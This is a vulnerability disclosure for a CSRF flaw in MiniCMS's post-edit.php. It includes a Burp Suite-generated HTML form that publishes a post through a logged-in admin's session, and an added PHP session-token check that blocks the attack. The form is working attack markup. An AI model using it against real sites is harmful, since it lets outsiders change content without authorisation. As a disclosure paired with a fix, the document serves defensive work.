Vendor of Product
https://github.com/bg5sbk/MiniCMS
Vulnerability Type
CSRF
Vulnerable File
post-edit.php
Affected Product Code Base
<v1.11
POC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.minicms.com/mc-admin/post-edit.php" method="POST">
<input type="hidden" name="_IS_POST_BACK_" value="" />
<input type="hidden" name="title" value="THISpoc" />
<input type="hidden" name="content" value="thispoc" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="year" value="" />
<input type="hidden" name="month" value="" />
<input type="hidden" name="day" value="" />
<input type="hidden" name="hourse" value="" />
<input type="hidden" name="minute" value="" />
<input type="hidden" name="second" value="" />
<input type="hidden" name="can_comment" value="1" />
<input type="hidden" name="state" value="publish" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="save" value="保存" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Vulnerability reproduction
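A session-bound token check that would cause the cross-site form above to be rejected, given here as an added example and not as MiniCMS code. The `csrf_token` field name, the helper function names and the use of PHP sessions are assumptions; `_IS_POST_BACK_` is the marker field taken from the PoC.

```php
<?php
// Added example, not MiniCMS code. Helper names and the csrf_token
// field are hypothetical; PHP sessions are assumed to be available.

function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the CSPRNG, so a third-party page cannot guess it.
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to emit inside the edit form next to its existing fields.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_is_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Reject array input (csrf_token[]=x) and an unset session token
    // before the comparison, so an empty value never matches.
    if (!is_string($sent) || !is_string($expected) || $expected === '') {
        return false;
    }
    // Constant-time comparison.
    return hash_equals($expected, $sent);
}

// Guard at the top of the state-changing handler, before anything is saved.
if (isset($_POST['_IS_POST_BACK_'])) {
    csrf_token(); // makes sure the session is started and a token exists
    if (!csrf_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}
```

The PoC form carries no `csrf_token` field and a third-party page cannot read the session's value, so its POST ends at the 403 branch.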